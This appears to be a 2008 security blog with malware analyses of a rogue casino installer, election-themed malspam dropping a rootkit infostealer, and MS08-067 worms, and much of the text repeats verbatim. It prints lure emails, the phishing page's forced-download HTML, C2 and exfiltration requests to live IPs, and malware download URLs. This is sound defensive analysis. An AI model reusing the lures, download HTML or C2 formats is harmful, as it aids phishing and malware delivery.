7bcfafbe500a3b440e9b18431997022a
30,720 bytes
The following major registry keys are added to launch Gold VIP Club Casino at statup.
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816} "(Default)"
Type: REG_SZ
Data: Gold Vip Club Casino
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\LocalServer32 "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\ProgID "(Default)"
Type: REG_SZ
Data: rtg.goldvipclub
HKEY_CLASSES_ROOT\rtg.goldvipclub "(Default)"
Type: REG_SZ
Data: URL: Realtime Gaming Protocol
HKEY_CLASSES_ROOT\rtg.goldvipclub "URL Protocol"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\rtg.goldvipclub\CLSID "(Default)"
Type: REG_SZ
Data: {0CBAA404-8C7F-4070-8E42-8847E2394816}
HKEY_CLASSES_ROOT\rtg.goldvipclub\DefaultIcon "(Default)"
Type: REG_SZ
Data: casino.exe
HKEY_CLASSES_ROOT\rtg.goldvipclub\shell\open\command "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gold VIP Club Casino "DisplayName"
Type: REG_SZ
Data: Gold VIP Club Casino
The launching of Gold VIP Club Casino initiates a connection to 200.122.168.189 TCP port 22053. The casino game requires an account to be created and personal information provided. Not sure how much I would trust a game that was installed through obfuscated JavaScript, a series of redirects and deceptive advertising :)
Sunday, November 9, 2008
Presidential Malspam
On 05 November 2008, Barack Obama emails began circulating that contained hyperlinks to a fake news site that offered a video of Obama’s historic win. The site attempted to fool visitors into installing an Adobe Flash update adobe_flash.exe. The executable download installs an Infostealer trojan designed to steal personal information. Sophos and McAfee provided updates on the threat.
Sample email verbiage included the following:
"From: "President election results"
Subject: A new president, a new congress...
Barack Obama Elected 44th President of United States Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5! ...... "
On 7 November 2008, it was McCain’s turn to be center stage on the malspam front. The following is a sample email with a hyperlink to fake usa.gov news website.
From: USA news [mailto:videonews@usa.gov]
Sent: Friday, November 07, 2008 10:53 AM
Subject: McCain want to stop Obama
McCain Lawyer Impeach Obama!
McCain has reached an agreement with the Obama lawyers that makes Obama resignation effective November 11.
Barack Obama can lost President's Chair.
McCain video report 7 November:
Proceed to the election results news page>> <http://productsremote.configlogin.selfservice.YwgnjIkoZ.viewcontent.privatelogin.TW76dHSS4.serensy.com/services.htm?/rnalid/siteminderagent/OSL.htm?LOGIN=TlbX8Ywgnj&VERIFY=IkoZR9TW76dHSS4> 2008 USA Government Official Web Site.
Sample malspam email subjects include:
McCain Lawyers Want to Stop Obama
Barack Obama in Danger - McCain will fight for president post
McCain Lawmakers Impeach Obama
McCain said today: 'Impeach Obama'
Obama Impeachment Resources: McCain Look at the Impeachment Process ...
Obama faces impeachment
The Impeachment of new president Obama
IMPEACH Barrack Obama | USA government news
Scandal: Obama Resignation Letter
Video: Obama post-resignation speech
Barack Obama can lost President's Chair. The President's Resignation.
Barack Obama can lost presidents chair.The President's Resignation Speech - TIME
Barack Obama president resignation - 23/7 News
Barack Obama can lost President's Chair. Political Strike at WV Mine
Barack Obama can lost President's Chair. Political Strike Confronts the Global Economy
Barack Obama can lost President's Chair.POLITICAL STRIKE TIES
McCain strike against Obama political way
Obama vs McCain 'Political Strike' May Undermine Labor Group
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Why MccAin Want to Stop Obama From president vacancy?
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
WScandal: Re-elections hich John McCain will show up to debate?
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections Why McCain Will Win
Scandal: Re-elections John McCain will defeat Barack Obama
Sample malspam email From field values include:
USA Government Center
USA news
CNN news
McCain News Center
Elections Centre
Election News
Sample malspam email From spoofed addresses include:
news@usa.gov
videonews@usa.gov
attention@usa.gov
news@usa.com
alert@usa.com
videonews@cnn.com
attention@cnn.com
news@cnn.com
alert@cnn.com
The malspam hyperlinks point to fast-fluxed hosted domains.
dieytemsn.com
poreibrsu.com
baraokl.com
serensy.com
oritrsunwart.com
The domains mapped to the following fast-flux IP addresses at the time of analysis.
IP Reverse Country
125.0.177.99 ntaich176099.aich.nt.ftth.ppp.infoweb.ne.jp JP
65.34.190.175 c-65-34-190-175.hsd1.fl.comcast.net US
75.31.240.8 adsl-75-31-240-8.dsl.chcgil.sbcglobal.net US
79.177.243.105 bzq-79-177-243-105.red.bezeqint.net IL
122.118.192.172 122-118-192-172.dynamic.hinet.net TW
The hyperlinks point to a fakeusa.gov website that advertises a McCain video and hyperlinks to get the Adobe Flash Media Player.
The site includes several methods of fooling victim’s into downloading AdobePlayer9.exe.
<meta http-equiv="REFRESH" content="10;url=../AdobePlayer9.exe">
<a href="AdobePlayer9.exe"><img border="0" src="160x41_Get_media_Player.jpg" width="160" height="41"></a>
<a href="AdobePlayer9.exe">
<img border="0" src="McCainvideo.jpg" width="582" height="402" onclick="alert1()" onMouseOver="window.status='http://media.usa.gov/downloads/McCain977855N';
return true" onMouseOut="window.status=''; return true" TARGET="_top"></a>
Malware Analysis
AdobePlayer9.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes
AdobePlayer9.exe creates C:\WINDOWS\9129837.exe
9129837.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes
9129837.exe creates C:\WINDOWS\new_drv.sys
new_drv.sys
a54de1d46ff7bdefbf9d9284c1916c5e
8,192 bytes
The following registry keys store malware identification data.
HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 50, FF, F4, 94
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: B8, 72, F7, 4E
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 2
The following registry keys install new_drv.sys as a service.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [HEX VALUES]
The following hidden registry key launches 9129837.exe at startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = C:\WINDOWS\9129837.exe
Both 9129837.exe and new_drv.sys install as a rootkit. Files, registry keys, and processes are hidden.
>SSDT State
NtEnumerateValueKey
Actual Address 0x81C1F58A
Hooked by: Unknown module filename
NtQueryDirectoryFile
Actual Address 0x81C1F6B6
Hooked by: Unknown module filename
NtQuerySystemInformation
Actual Address 0x81C1F85C
Hooked by: Unknown module filename
>Processes
!!!!!!!!!!!Hidden process: C:\WINDOWS\9129837.exe
Process Id: 596
EPROCESS Address: 0x81C9D9F8
>Files
Suspect File: C:\WINDOWS\9129837.exe Status: Hidden
Suspect File: C:\WINDOWS\new_drv.sys Status: Hidden
The malware hooks into any running process. The following example shows a hook into svchost.exe.
>Hooks
[1056]svchost.exe-->kernel32.dll-->CreateProcessA, Type: Inline - RelativeJump at address 0x77E61BBC hook handler located in [unknown_code_page]
[1056]svchost.exe-->kernel32.dll-->CreateProcessW, Type: Inline - RelativeJump at address 0x77E61B8E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump at address 0x7622B059 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExW, Type: Inline - RelativeJump at address 0x76240C8A hook handler located in [unknown_code_page]
9129837.exe listens on TCP port 13899 and runs a s a hidden process.
Process C:\WINDOWS\9129837.exe (*** hidden ***)
Protocol Local Address Foreign Address State PID PathName
TCP 0.0.0.0 : 13899 0.0.0.0 : 0 LISTENING 596 C:\WINDOWS\9129837.exe
UDP 127.0.0.1 : 1037 * : * 596 C:\WINDOWS\9129837.exe
RAW --- --- --- 596 C:\WINDOWS\9129837.exe
9129837.exe connects to 91.203.93.57 (UA) to register itself, receive instructions and exfiltrate data. The malware performs the following connections:
POST /cgi-bin/pstore.cgi
GET /cgi-bin/cmd.cgi
GET /cgi-bin/options.cgi
POST /cgi-bin/cert.cgi
POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dbe3fdbe3fdbe3f
User-Agent: IE
Host: 91.203.93.57
Content-Length: 224
Cache-Control: no-cache
----------------------------dbe3fdbe3fdbe3f
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream
Forms:
----------------------------dbe3fdbe3fdbe3f--
GET /cgi-bin/cmd.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57
GET /cgi-bin/options.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57
POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dcd05dcd05dcd05
User-Agent: IE
Host: 91.203.93.57
Content-Length: 298
Cache-Control: no-cache
----------------------------dcd05dcd05dcd05
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream
0S...0...*.H.. .......0.0;0.0...+............2........&..........N...+..\.......{....
----------------------------dcd05dcd05dcd05--
Sample email verbiage included the following:
"From: "President election results"
Subject: A new president, a new congress...
Barack Obama Elected 44th President of United States Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5! ...... "
On 7 November 2008, it was McCain’s turn to be center stage on the malspam front. The following is a sample email with a hyperlink to fake usa.gov news website.
From: USA news [mailto:videonews@usa.gov]
Sent: Friday, November 07, 2008 10:53 AM
Subject: McCain want to stop Obama
McCain Lawyer Impeach Obama!
McCain has reached an agreement with the Obama lawyers that makes Obama resignation effective November 11.
Barack Obama can lost President's Chair.
McCain video report 7 November:
Proceed to the election results news page>> <http://productsremote.configlogin.selfservice.YwgnjIkoZ.viewcontent.privatelogin.TW76dHSS4.serensy.com/services.htm?/rnalid/siteminderagent/OSL.htm?LOGIN=TlbX8Ywgnj&VERIFY=IkoZR9TW76dHSS4> 2008 USA Government Official Web Site.
Sample malspam email subjects include:
McCain Lawyers Want to Stop Obama
Barack Obama in Danger - McCain will fight for president post
McCain Lawmakers Impeach Obama
McCain said today: 'Impeach Obama'
Obama Impeachment Resources: McCain Look at the Impeachment Process ...
Obama faces impeachment
The Impeachment of new president Obama
IMPEACH Barrack Obama | USA government news
Scandal: Obama Resignation Letter
Video: Obama post-resignation speech
Barack Obama can lost President's Chair. The President's Resignation.
Barack Obama can lost presidents chair.The President's Resignation Speech - TIME
Barack Obama president resignation - 23/7 News
Barack Obama can lost President's Chair. Political Strike at WV Mine
Barack Obama can lost President's Chair. Political Strike Confronts the Global Economy
Barack Obama can lost President's Chair.POLITICAL STRIKE TIES
McCain strike against Obama political way
Obama vs McCain 'Political Strike' May Undermine Labor Group
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Why MccAin Want to Stop Obama From president vacancy?
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
WScandal: Re-elections hich John McCain will show up to debate?
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections Why McCain Will Win
Scandal: Re-elections John McCain will defeat Barack Obama
Sample malspam email From field values include:
USA Government Center
USA news
CNN news
McCain News Center
Elections Centre
Election News
Sample malspam email From spoofed addresses include:
news@usa.gov
videonews@usa.gov
attention@usa.gov
news@usa.com
alert@usa.com
videonews@cnn.com
attention@cnn.com
news@cnn.com
alert@cnn.com
The malspam hyperlinks point to fast-fluxed hosted domains.
dieytemsn.com
poreibrsu.com
baraokl.com
serensy.com
oritrsunwart.com
The domains mapped to the following fast-flux IP addresses at the time of analysis.
IP Reverse Country
125.0.177.99 ntaich176099.aich.nt.ftth.ppp.infoweb.ne.jp JP
65.34.190.175 c-65-34-190-175.hsd1.fl.comcast.net US
75.31.240.8 adsl-75-31-240-8.dsl.chcgil.sbcglobal.net US
79.177.243.105 bzq-79-177-243-105.red.bezeqint.net IL
122.118.192.172 122-118-192-172.dynamic.hinet.net TW
The hyperlinks point to a fakeusa.gov website that advertises a McCain video and hyperlinks to get the Adobe Flash Media Player.
The site includes several methods of fooling victim’s into downloading AdobePlayer9.exe.
<meta http-equiv="REFRESH" content="10;url=../AdobePlayer9.exe">
<a href="AdobePlayer9.exe"><img border="0" src="160x41_Get_media_Player.jpg" width="160" height="41"></a>
<a href="AdobePlayer9.exe">
<img border="0" src="McCainvideo.jpg" width="582" height="402" onclick="alert1()" onMouseOver="window.status='http://media.usa.gov/downloads/McCain977855N';
return true" onMouseOut="window.status=''; return true" TARGET="_top"></a>
Malware Analysis
AdobePlayer9.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes
AdobePlayer9.exe creates C:\WINDOWS\9129837.exe
9129837.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes
9129837.exe creates C:\WINDOWS\new_drv.sys
new_drv.sys
a54de1d46ff7bdefbf9d9284c1916c5e
8,192 bytes
The following registry keys store malware identification data.
HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 50, FF, F4, 94
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: B8, 72, F7, 4E
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 2
The following registry keys install new_drv.sys as a service.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [HEX VALUES]
The following hidden registry key launches 9129837.exe at startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = C:\WINDOWS\9129837.exe
Both 9129837.exe and new_drv.sys install as a rootkit. Files, registry keys, and processes are hidden.
>SSDT State
NtEnumerateValueKey
Actual Address 0x81C1F58A
Hooked by: Unknown module filename
NtQueryDirectoryFile
Actual Address 0x81C1F6B6
Hooked by: Unknown module filename
NtQuerySystemInformation
Actual Address 0x81C1F85C
Hooked by: Unknown module filename
>Processes
!!!!!!!!!!!Hidden process: C:\WINDOWS\9129837.exe
Process Id: 596
EPROCESS Address: 0x81C9D9F8
>Files
Suspect File: C:\WINDOWS\9129837.exe Status: Hidden
Suspect File: C:\WINDOWS\new_drv.sys Status: Hidden
The malware hooks into any running process. The following example shows a hook into svchost.exe.
>Hooks
[1056]svchost.exe-->kernel32.dll-->CreateProcessA, Type: Inline - RelativeJump at address 0x77E61BBC hook handler located in [unknown_code_page]
[1056]svchost.exe-->kernel32.dll-->CreateProcessW, Type: Inline - RelativeJump at address 0x77E61B8E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump at address 0x7622B059 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExW, Type: Inline - RelativeJump at address 0x76240C8A hook handler located in [unknown_code_page]
9129837.exe listens on TCP port 13899 and runs a s a hidden process.
Process C:\WINDOWS\9129837.exe (*** hidden ***)
Protocol Local Address Foreign Address State PID PathName
TCP 0.0.0.0 : 13899 0.0.0.0 : 0 LISTENING 596 C:\WINDOWS\9129837.exe
UDP 127.0.0.1 : 1037 * : * 596 C:\WINDOWS\9129837.exe
RAW --- --- --- 596 C:\WINDOWS\9129837.exe
9129837.exe connects to 91.203.93.57 (UA) to register itself, receive instructions and exfiltrate data. The malware performs the following connections:
POST /cgi-bin/pstore.cgi
GET /cgi-bin/cmd.cgi
GET /cgi-bin/options.cgi
POST /cgi-bin/cert.cgi
POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dbe3fdbe3fdbe3f
User-Agent: IE
Host: 91.203.93.57
Content-Length: 224
Cache-Control: no-cache
----------------------------dbe3fdbe3fdbe3f
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream
Forms:
----------------------------dbe3fdbe3fdbe3f--
GET /cgi-bin/cmd.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57
GET /cgi-bin/options.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57
POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dcd05dcd05dcd05
User-Agent: IE
Host: 91.203.93.57
Content-Length: 298
Cache-Control: no-cache
----------------------------dcd05dcd05dcd05
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream
0S...0...*.H.. .......0.0;0.0...+............2........&..........N...+..\.......{....
----------------------------dcd05dcd05dcd05--
MS08-067 and W32.Wecorl
On 2 November 2008, Symantec reported a “worm” called W32.Wercol that attempted to exploit the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067). The following provides analysis for the W32.Wercol malware variant 10wrjcenew.exe.
In a lab test, the malware 10wrjcenew.exe:
Created C:\DOCUME~1\%user profile%\LOCALS~1\Temp\Install.2008.dat
Deleted C:\WINDOWS\System32\Dllcache\Svchost.exe
Modified C:\WINDOWS\System32\Svchost.exe
Created C:\WINDOWS\system32\7DBF6DA4
The following registry keys were created:
HKEY_LOCAL_MACHINE\SOFTWARE\Google "[MAC ADDRESS]"
Type: REG_BINARY
Data: (data too large: 3584 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Licenses "[MAC ADDRESS]"
Type: REG_BINARY
Data: [HEXADECIMAL DATA]
The malware proceeded to download mimi.1268772 from ls.cc86.info (121.12.172.44, CN) and pp.gif from blog-imgs-27.fc2.com (208.71.107.52, US)
GET /mimi.1268772 HTTP/1.1
Host: ls.cc86.info
GET /u/f/o/ufo2000sgd/pp.gif HTTP/1.1
Host: blog-imgs-27.fc2.com
The malware attempted a MS08-067 buffer overflow exploit against 121.x.x.x UDP port 137
0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..
The malware connects to ce.10wrj.com (218.95.101.68, CN) ClientReg.aspx and ClientTask.aspx to register the malware and receive C2 instructions. The sample connection shows a download request for ce.10wrj.com/nb1103.exe.
GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com
HTTP/1.1 200 OK
xxyysign xxyyMyIP=xx.xx.xx.xx
GET /ClientTask.aspx?mac= xx:xx:xx:xx:xx:xx &Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com
HTTP/1.1 200 OK
xxyysign
xxyyUserNamePassWord=CeUser:CePassWord
xxyyPort=0
xxyyUpdata=http://ce.10wrj.com/nb1103.exe*
xxyyRemoteHost=
The following files were observed during analysis:
10752 f01fd7ecfce8af65832a3a57d2789fa6 10wrjcenew.exe
12800 0f7d9c87b0ce1fa520473119752c6f79 3EDFB6D2
900 14c9db2b8177ca199f283e644fcda225 mimi.1268772
404992 0fdb364e8666140d4570d24f363d26d5 nb1103.exe
258048 944b1a83ee17db7fa779a2e7d970768c pp.gif
In a lab test, the malware 10wrjcenew.exe:
Created C:\DOCUME~1\%user profile%\LOCALS~1\Temp\Install.2008.dat
Deleted C:\WINDOWS\System32\Dllcache\Svchost.exe
Modified C:\WINDOWS\System32\Svchost.exe
Created C:\WINDOWS\system32\7DBF6DA4
The following registry keys were created:
HKEY_LOCAL_MACHINE\SOFTWARE\Google "[MAC ADDRESS]"
Type: REG_BINARY
Data: (data too large: 3584 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Licenses "[MAC ADDRESS]"
Type: REG_BINARY
Data: [HEXADECIMAL DATA]
The malware proceeded to download mimi.1268772 from ls.cc86.info (121.12.172.44, CN) and pp.gif from blog-imgs-27.fc2.com (208.71.107.52, US)
GET /mimi.1268772 HTTP/1.1
Host: ls.cc86.info
GET /u/f/o/ufo2000sgd/pp.gif HTTP/1.1
Host: blog-imgs-27.fc2.com
The malware attempted a MS08-067 buffer overflow exploit against 121.x.x.x UDP port 137
0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..
The malware connects to ce.10wrj.com (218.95.101.68, CN) ClientReg.aspx and ClientTask.aspx to register the malware and receive C2 instructions. The sample connection shows a download request for ce.10wrj.com/nb1103.exe.
GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com
HTTP/1.1 200 OK
xxyysign xxyyMyIP=xx.xx.xx.xx
GET /ClientTask.aspx?mac= xx:xx:xx:xx:xx:xx &Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com
HTTP/1.1 200 OK
xxyysign
xxyyUserNamePassWord=CeUser:CePassWord
xxyyPort=0
xxyyUpdata=http://ce.10wrj.com/nb1103.exe*
xxyyRemoteHost=
The following files were observed during analysis:
10752 f01fd7ecfce8af65832a3a57d2789fa6 10wrjcenew.exe
12800 0f7d9c87b0ce1fa520473119752c6f79 3EDFB6D2
900 14c9db2b8177ca199f283e644fcda225 mimi.1268772
404992 0fdb364e8666140d4570d24f363d26d5 nb1103.exe
258048 944b1a83ee17db7fa779a2e7d970768c pp.gif
Thursday, November 6, 2008
MS08-067 and Trojan.Gimmiv.A
On 24 October 2008, Microsoft released an out-of-cycle patch that addressed a stack buffer overflow vulnerability in the Microsoft Windows Server service MS08-067, CVE-2008-4250. Per Microsoft, "This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit."
Public exploit code and malware began circulating as soon as the patch was released. Microsoft and Symantec provided analysis on malware known as Gimmiv.A. The malware harvests and exfiltrates system information and is able to scan and exploit the MS08-067 vulnerability. The following provides analysis findings for Gimmiv.A.
Site 59.106.145.58 (JP) was found to host nine Gimmiv.A binaries, n*1-9.
http[:]// 59.106.145.58/n*.exe
dc3fdfde66fffb6cfbec946a237787d8 397312 59.106.145.58/n1.exe
f173007fbd8e2190af3be7837acd70a4 397312 59.106.145.58/n2.exe
3ee354cc8b63b8849b28e6f376f2b263 397312 59.106.145.58/n3.exe
6c3e53864541bb13fa7853f7b580b807 397312 59.106.145.58/n4.exe
24cd978da62cff8370b83c26e134ff4c 397312 59.106.145.58/n5.exe
86d75ae361637a8f9114bb3a40f710d3 397312 59.106.145.58/n6.exe
ee70f981514803e1fb4e6b65f492a56d 397312 59.106.145.58/n7.exe
8d66f28d028a4838d09ce4b91d35b7cb 397312 59.106.145.58/n8.exe
477aac8d472a7bea8b906718a2f50c67 397312 59.106.145.58/n9.exe
The malware n2.exe was analyzed as an example.
n2.exe creates c:\WINDOWS\system32\wbem\sysmgr.dll
sysmgr.dll
1cdc67b1d55e9a2d30c0dba193375c11
336384 bytes
The following registry keys are created to install the malware as a service.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
"sysmgr" = sysmgr
"DisplayName" = System Maintenance Service
"ErrorControl" = 0
"ImagePath" = %SystemRoot%\System32\svchost.exe -k sysmgr
"ObjectName" = LocalSystem
"Start" = 2
"Type" = 10, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Enum
"0" = Root\LEGACY_SYSMGR\0000
"Count" = 1
"NextInstance" = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Parameters
"ServiceDll" = C:\WINDOWS\System32\wbem\sysmgr.dll
"ServiceMain" = ServiceMainFunc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Security
"Security" = binary data
The malware searches the registry for the presence of installed antivirus programs and active processes for avp.exe and dwm.exe.
0002549C 1002549C 0 SOFTWARE\BitDefender
000254B4 100254B4 0 avp.exe
000254BC 100254BC 0 SOFTWARE\Jiangmin
000254D8 100254D8 0 SOFTWARE\KasperskyLab
000254F0 100254F0 0 SOFTWARE\Kingsoft
